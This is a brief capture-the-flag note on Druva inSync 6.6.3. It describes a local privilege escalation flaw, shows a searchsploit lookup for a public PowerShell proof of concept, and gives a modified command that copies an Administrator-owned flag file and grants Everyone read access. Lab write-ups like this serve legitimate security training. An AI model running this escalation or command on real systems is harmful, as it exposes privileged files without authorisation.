Druva

101

Druva is a cloud-based data protection platform that provides backup, recovery, and data management services for endpoints, servers, and cloud applications. Druva inSync is the Windows endpoint backup client—an agent installed on devices to securely back up data to Druva’s cloud. Essentially, Druva inSync acts as the local software component enabling Druva’s cloud service to protect endpoint data.

Attacks

The Druva inSync 6.6.3 vulnerability is a local privilege escalation (LPE) flaw caused by insecure handling of permissions or improperly protected components in the Druva inSync client software.

$ searchsploit Druva 6.6.3

Druva inSync Windows Client 6.6.3 - Local Privilege Escalation (PowerShell) | windows/local/49211.ps1

The PoC can be modified for CTF purposes:

# Modified code
$cmd = "type C:\Users\Administrator\desktop\flag.txt > C:\Windows\Temp\flag.txt && icacls C:\Windows\Temp\flag.txt /grant Everyone:R /T /C /Q"
